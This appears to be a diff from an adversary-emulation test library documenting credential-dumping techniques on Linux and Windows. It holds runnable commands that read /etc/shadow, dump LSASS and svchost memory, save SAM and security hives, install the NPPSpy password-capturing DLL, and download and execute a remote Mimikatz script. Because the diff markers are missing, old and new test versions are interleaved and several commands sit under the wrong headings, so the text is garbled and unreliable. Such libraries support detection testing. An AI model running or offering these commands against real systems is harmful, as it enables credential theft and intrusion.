$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
cleanup_command: |
rm -f "#{output_file}"
- name: Capture Passwords with MimiPenguin
auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
description: |
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.007Test3.txt
MimiPenguin_Location:
description: Path of MimiPenguin script
type: Path
default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh
dependency_executor_name: sh
dependencies:
- description: |
MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
prereq_command: |
if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
- description: |
Strings must be installed
prereq_command: |
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
sudo apt-get -y install binutils
- description: |
Python2 must be installed
prereq_command: |
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
sudo apt-get -y install python2
- description: |
Libc-bin must be installed
prereq_command: |
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
sudo apt-get -y install libc-bin
executor:
command: |
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file} > /dev/null
name: bash
elevation_required: true
atomics/T1003.007/src/dump_heap.py
-31
View File
@@ -1,31 +0,0 @@
#!/usr/bin/env python
'''Dump a process's heap space to disk
Usage:
python dump_proc.py <PID> <filepath>
'''
import argparse
parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
parser.add_argument('pid', type=int, help='ID of process to dump')
parser.add_argument('filepath', help='A filepath to save output to')
args = parser.parse_args()
process_id = args.pid
output_file = args.filepath
with open("/proc/{}/maps".format(process_id), "r") as maps_file:
# example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0 [heap]
heap_line = next(filter(lambda line: "[heap]" in line, maps_file))
heap_range = heap_line.split(' ')[0]
mem_start = int(heap_range.split('-')[0], 16)
mem_stop = int(heap_range.split('-')[1], 16)
mem_size = mem_stop - mem_start
with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
mem_file.seek(mem_start, 0)
heap_mem = mem_file.read(mem_size)
with open(output_file, "wb") as ofile:
ofile.write(heap_mem)
atomics/T1003.008/T1003.008.md
-170
View File
@@ -1,170 +0,0 @@
# T1003.008 - OS Credential Dumping: /etc/passwd and /etc/shadow
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
<blockquote>Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local)
- [Atomic Test #2 - Access /etc/passwd (Local)](#atomic-test-2---access-etcpasswd-local)
- [Atomic Test #3 - Access /etc/{shadow,passwd} with a standard bin that's not cat](#atomic-test-3---access-etcshadowpasswd-with-a-standard-bin-thats-not-cat)
- [Atomic Test #4 - Access /etc/{shadow,passwd} with shell builtins](#atomic-test-4---access-etcshadowpasswd-with-shell-builtins)
<br/>
## Atomic Test #1 - Access /etc/shadow (Local)
/etc/shadow file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
```
#### Cleanup Commands:
```bash
rm -f #{output_file}
```
<br/>
<br/>
## Atomic Test #2 - Access /etc/passwd (Local)
/etc/passwd file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`!
```sh
cat /etc/passwd > #{output_file}
cat #{output_file}
```
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
<br/>
<br/>
## Atomic Test #3 - Access /etc/{shadow,passwd} with a standard bin that's not cat
Dump /etc/passwd and /etc/shadow using ed
**Supported Platforms:** Linux
**auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}
```
#### Cleanup Commands:
```bash
rm -f #{output_file}
```
<br/>
<br/>
## Atomic Test #4 - Access /etc/{shadow,passwd} with shell builtins
Dump /etc/passwd and /etc/shadow using bash builtins
**Supported Platforms:** Linux
**auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
function testcat(){ echo "$(< $1)"; }
testcat /etc/passwd > #{output_file}
testcat /etc/shadow > #{output_file}
```
#### Cleanup Commands:
```bash
rm -f #{output_file}
```
<br/>
atomics/T1003.008/T1003.008.yaml
-78
View File
@@ -1,78 +0,0 @@
attack_technique: T1003.008
display_name: 'OS Credential Dumping: /etc/passwd and /etc/shadow'
atomic_tests:
- name: Access /etc/shadow (Local)
auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235
description: |
/etc/shadow file is accessed in Linux environments
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.008.txt
executor:
command: |
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file}
name: bash
elevation_required: true
- name: Access /etc/passwd (Local)
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
description: |
/etc/passwd file is accessed in Linux environments
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.008.txt
executor:
command: |
cat /etc/passwd > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file}
name: sh
- name: Access /etc/{shadow,passwd} with a standard bin that's not cat
auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a
description: |
Dump /etc/passwd and /etc/shadow using ed
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.008.txt
executor:
command: |
echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}
cleanup_command: |
rm -f #{output_file}
name: bash
elevation_required: true
- name: Access /etc/{shadow,passwd} with shell builtins
auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713
description: |
Dump /etc/passwd and /etc/shadow using bash builtins
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.008.txt
executor:
command: |
function testcat(){ echo "$(< $1)"; }
testcat /etc/passwd > #{output_file}
testcat /etc/shadow > #{output_file}
cleanup_command: |
rm -f #{output_file}
name: bash
elevation_required: true
atomics/T1003/T1003.md
+235 -223
View File
@@ -1,294 +1,306 @@
# T1003 - OS Credential Dumping
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003)
<blockquote>Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
# T1003 - Credential Dumping
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003)
<blockquote>Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
</blockquote>
Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
### Windows
#### SAM (Security Accounts Manager)
The SAM is a database file that contains local accounts for the host, typically those found with the net user command. To enumerate the SAM database, system level access is required.
 
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):
* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>
Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)
Notes:
Rid 500 account is the local, in-built administrator.
Rid 501 is the guest account.
User accounts start with a RID of 1,000+.
#### Cached Credentials
The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.
 
A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
Cached credentials for Windows Vista are derived using PBKDF2.
#### Local Security Authority (LSA) Secrets
With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.
 
When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.
 
A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
Windows 10 adds protections for LSA Secrets described in Mitigation.
#### NTDS from Domain Controller
Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
#### Group Policy Preference (GPP) Files
Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.
These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploits post exploitation module: "post/windows/gather/credentials/gpp"
* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
Notes:
On the SYSVOL share, the following can be used to enumerate potential XML files.
dir /s * .xml
#### Service Principal Names (SPNs)
See [Kerberoasting](https://attack.mitre.org/techniques/T1208).
#### Plaintext Credentials
After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.
SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.
The following SSPs can be used to access credentials:
Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)
 
The following tools can be used to enumerate credentials:
* [Windows Credential Editor](https://attack.mitre.org/software/S0005)
* [Mimikatz](https://attack.mitre.org/software/S0002)
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>
Locally, mimikatz can be run:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>
#### DCSync
DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
### Linux
#### Proc filesystem
The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Gsecdump](#atomic-test-1---gsecdump)
- [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz)
- [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)
- [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump)
- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
- [Atomic Test #3 - Windows Credential Editor](#atomic-test-3---windows-credential-editor)
- [Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
- [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
- [Atomic Test #5 - Dump LSASS.exe Memory using ProcDump](#atomic-test-5---dump-lsassexe-memory-using-procdump)
- [Atomic Test #6 - Dump Credential Manager using keymgr.dll and rundll32.exe](#atomic-test-6---dump-credential-manager-using-keymgrdll-and-rundll32exe)
- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz)
- [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil)
<br/>
## Atomic Test #1 - Gsecdump
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's followed by two 32 character hashes.
If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus.
You will receive only error output if you do not run this test from an elevated context (run as administrator)
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
## Atomic Test #1 - Powershell Mimikatz
Dumps Credentials via Powershell by invoking a remote mimikatz script
**Supported Platforms:** Windows
**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;gsecdump.exe|
| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
| gsecdump_url | Path to download Gsecdump binary file | Url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{gsecdump_exe} -a
#### Run it with `powershell`!
```
#### Dependencies: Run with `powershell`!
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
```
<br/>
<br/>
## Atomic Test #2 - Credential Dumping with NPPSpy
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
## Atomic Test #2 - Gsecdump
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
**Supported Platforms:** Windows
**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
#### Run it with `command_prompt`!
```
#### Cleanup Commands:
```powershell
$cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER
$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''
Set-ItemProperty -Path $cleanupPath.PSPath -Name "PROVIDERORDER" -Value $cleanupUpdatedValue
Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -Recurse -ErrorAction Ignore
Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
gsecdump -a
```
#### Dependencies: Run with `powershell`!
##### Description: NPPSpy.dll must be available in local temp directory
##### Check Prereq Commands:
```powershell
if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
```
<br/>
<br/>
## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
## Atomic Test #3 - Windows Credential Editor
http://www.ampliasecurity.com/research/windows-credentials-editor/
**Supported Platforms:** Windows
**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | output.txt|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
#### Run it with `command_prompt`!
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
wce -o #{output_file}
```
<br/>
<br/>
## Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
## Atomic Test #4 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
**Supported Platforms:** Windows
**auto_generated_guid:** 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
#### Run it with `command_prompt`!
```
#### Dependencies: Run with `powershell`!
##### Description: IIS must be installed prior to running the test
##### Check Prereq Commands:
```powershell
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
```
##### Get Prereq Commands:
```powershell
Install-WindowsFeature -name Web-Server -IncludeManagementTools
```
<br/>
<br/>
## Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
**Supported Platforms:** Windows
**auto_generated_guid:** 42510244-5019-48fa-a0e5-66c3b76e6049
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
#### Run it with `command_prompt`!
```
#### Dependencies: Run with `powershell`!
##### Description: IIS must be installed prior to running the test
##### Check Prereq Commands:
```powershell
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
procdump.exe -accepteula -ma lsass.exe #{output_file}
```
##### Get Prereq Commands:
```powershell
Install-WindowsFeature -name Web-Server -IncludeManagementTools
```
<br/>
<br/>
## Atomic Test #6 - Dump Credential Manager using keymgr.dll and rundll32.exe
This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows to export stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.).
Reference: https://twitter.com/0gtweet/status/1415671356239216653
## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** 84113186-ed3c-4d0d-8a3c-8980c86c1f4a
#### Attack Commands: Run with `powershell`!
```powershell
rundll32.exe keymgr,KRShowKeyMgr
```
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
<br/>
<br/>
## Atomic Test #7 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
#### Run it with these steps!
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
<br/>
<br/>
## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team|
#### Run it with `command_prompt`!
```
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
```
<br/>
atomics/T1003/T1003.yaml
+122 -143
View File
@@ -1,155 +1,134 @@
---
attack_technique: T1003
display_name: OS Credential Dumping
display_name: Credential Dumping
atomic_tests:
- name: Powershell Mimikatz
description: |
Dumps Credentials via Powershell by invoking a remote mimikatz script
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
- name: Gsecdump
auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
description: |
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's followed by two 32 character hashes.
If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus.
You will receive only error output if you do not run this test from an elevated context (run as administrator)
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
